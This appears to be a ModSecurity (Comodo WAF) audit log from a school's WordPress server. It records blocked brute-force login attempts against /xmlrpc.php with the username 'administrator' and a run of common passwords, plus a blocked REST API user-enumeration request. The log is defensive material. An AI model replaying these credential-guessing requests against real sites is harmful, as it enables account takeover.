[tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867487317320 4508 (- - -) Stopwatch2: 1749867487317320 4508; combined=3332, p1=359, p2=2808, p3=0, p4=0, p5=97, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efd4582a-Z-- --24944b4d-A-- [14/Jun/2025:09:19:07 +0700] aEzcG2mwZ6YUkjOdtI7HGAAAAA8 103.236.140.4 38220 103.236.140.4 8181 --24944b4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --24944b4d-C-- wp.getUsersBlogs administrator administrator2006 --24944b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24944b4d-E-- --24944b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867547037621 4454 (- - -) Stopwatch2: 1749867547037621 4454; combined=3333, p1=340, p2=2807, p3=0, p4=0, p5=106, sr=77, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24944b4d-Z-- --48f72c51-A-- [14/Jun/2025:09:20:07 +0700] aEzcV2mwZ6YUkjOdtI7HcwAAAA4 103.236.140.4 38448 103.236.140.4 8181 --48f72c51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48f72c51-C-- wp.getUsersBlogs administrator administrator@1986 --48f72c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f72c51-E-- --48f72c51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867607027013 5069 (- - -) Stopwatch2: 1749867607027013 5069; combined=3717, p1=431, p2=3116, p3=0, p4=0, p5=99, sr=106, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f72c51-Z-- --c256ba38-A-- [14/Jun/2025:09:21:10 +0700] aEzclmmwZ6YUkjOdtI7HpwAAABc 103.236.140.4 38560 103.236.140.4 8181 --c256ba38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c256ba38-C-- wp.getUsersBlogs administrator smkn22-jkt.sch888 --c256ba38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c256ba38-E-- --c256ba38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867670287695 5458 (- - -) Stopwatch2: 1749867670287695 5458; combined=3855, p1=489, p2=3196, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c256ba38-Z-- --68c03a58-A-- [14/Jun/2025:09:22:10 +0700] aEzc0mIDXuKmWNi2UBS2yAAAAEA 103.236.140.4 38704 103.236.140.4 8181 --68c03a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --68c03a58-C-- wp.getUsersBlogs administrator 1234!@#$ --68c03a58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c03a58-E-- --68c03a58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867730100410 4306 (- - -) Stopwatch2: 1749867730100410 4306; combined=3194, p1=351, p2=2681, p3=0, p4=0, p5=95, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c03a58-Z-- --7c9e2474-A-- [14/Jun/2025:09:23:17 +0700] aEzdFWmwZ6YUkjOdtI7HyAAAAAc 103.236.140.4 38872 103.236.140.4 8181 --7c9e2474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c9e2474-C-- wp.getUsersBlogs administrator test1 --7c9e2474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9e2474-E-- --7c9e2474-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867797393073 5727 (- - -) Stopwatch2: 1749867797393073 5727; combined=3981, p1=500, p2=3305, p3=0, p4=0, p5=104, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9e2474-Z-- --52566e15-A-- [14/Jun/2025:09:24:17 +0700] aEzdUV3g_boun6Rx5jLSWgAAAM8 103.236.140.4 39068 103.236.140.4 8181 --52566e15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --52566e15-C-- wp.getUsersBlogs administrator 11111111 --52566e15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52566e15-E-- --52566e15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867857234513 6006 (- - -) Stopwatch2: 1749867857234513 6006; combined=4071, p1=515, p2=3384, p3=0, p4=0, p5=102, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52566e15-Z-- --1529065c-A-- [14/Jun/2025:09:25:17 +0700] aEzdjWmwZ6YUkjOdtI7H_AAAABM 103.236.140.4 39148 103.236.140.4 8181 --1529065c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1529065c-C-- wp.getUsersBlogs administrator secret --1529065c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1529065c-E-- --1529065c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867917034695 4192 (- - -) Stopwatch2: 1749867917034695 4192; combined=3219, p1=346, p2=2688, p3=0, p4=0, p5=106, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1529065c-Z-- --920e9b58-A-- [14/Jun/2025:09:26:01 +0700] aEzduUMWfhkd5Y0sFtrr5AAAAIk 103.236.140.4 39240 103.236.140.4 8181 --920e9b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --920e9b58-C-- wp.getUsersBlogs administrator 1234%^&* --920e9b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --920e9b58-E-- --920e9b58-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867961682660 4455 (- - -) Stopwatch2: 1749867961682660 4455; combined=3384, p1=371, p2=2831, p3=0, p4=0, p5=107, sr=79, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --920e9b58-Z-- --8d73c224-A-- [14/Jun/2025:09:26:20 +0700] aEzdzF3g_boun6Rx5jLSZQAAAMA 103.236.140.4 39250 103.236.140.4 8181 --8d73c224-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d73c224-C-- wp.getUsersBlogs administrator 123asdasd --8d73c224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d73c224-E-- --8d73c224-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867980354934 5342 (- - -) Stopwatch2: 1749867980354934 5342; combined=3792, p1=485, p2=3137, p3=0, p4=0, p5=100, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d73c224-Z-- --e866ad10-A-- [14/Jun/2025:09:27:20 +0700] aEzeCGmwZ6YUkjOdtI7IUQAAAA0 103.236.140.4 39352 103.236.140.4 8181 --e866ad10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e866ad10-C-- wp.getUsersBlogs administrator pa$$word1 --e866ad10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e866ad10-E-- --e866ad10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868040483703 4384 (- - -) Stopwatch2: 1749868040483703 4384; combined=3398, p1=341, p2=2890, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e866ad10-Z-- --bb2a1601-A-- [14/Jun/2025:09:28:20 +0700] aEzeRF3g_boun6Rx5jLSZwAAAMU 103.236.140.4 39536 103.236.140.4 8181 --bb2a1601-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb2a1601-C-- wp.getUsersBlogs administrator freedom --bb2a1601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb2a1601-E-- --bb2a1601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868100308696 4833 (- - -) Stopwatch2: 1749868100308696 4833; combined=3526, p1=363, p2=2961, p3=0, p4=0, p5=114, sr=79, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb2a1601-Z-- --435ea854-A-- [14/Jun/2025:09:29:21 +0700] aEzegWmwZ6YUkjOdtI7I8QAAAAo 103.236.140.4 39698 103.236.140.4 8181 --435ea854-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --435ea854-C-- wp.getUsersBlogs administrator iloveyou1 --435ea854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --435ea854-E-- --435ea854-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868161150590 4838 (- - -) Stopwatch2: 1749868161150590 4838; combined=3516, p1=368, p2=2967, p3=0, p4=0, p5=103, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --435ea854-Z-- --e0d60a2d-A-- [14/Jun/2025:09:30:21 +0700] aEzevWmwZ6YUkjOdtI7JCQAAAAg 103.236.140.4 39834 103.236.140.4 8181 --e0d60a2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e0d60a2d-C-- wp.getUsersBlogs administrator dallas --e0d60a2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0d60a2d-E-- --e0d60a2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868221628150 3815 (- - -) Stopwatch2: 1749868221628150 3815; combined=2977, p1=326, p2=2508, p3=0, p4=0, p5=83, sr=70, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0d60a2d-Z-- --bdc2757f-A-- [14/Jun/2025:09:31:21 +0700] aEze-WmwZ6YUkjOdtI7JaQAAABM 103.236.140.4 40054 103.236.140.4 8181 --bdc2757f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bdc2757f-C-- wp.getUsersBlogs administrator newcastle1 --bdc2757f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc2757f-E-- --bdc2757f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868281212049 4339 (- - -) Stopwatch2: 1749868281212049 4339; combined=3377, p1=378, p2=2829, p3=0, p4=0, p5=99, sr=106, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc2757f-Z-- --4d8ded76-A-- [14/Jun/2025:09:32:11 +0700] aEzfK0MWfhkd5Y0sFtrr6wAAAJI 103.236.140.4 40112 103.236.140.4 8181 --4d8ded76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.247.200.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.247.200.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d8ded76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d8ded76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749868331977058 2548 (- - -) Stopwatch2: 1749868331977058 2548; combined=1160, p1=419, p2=713, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
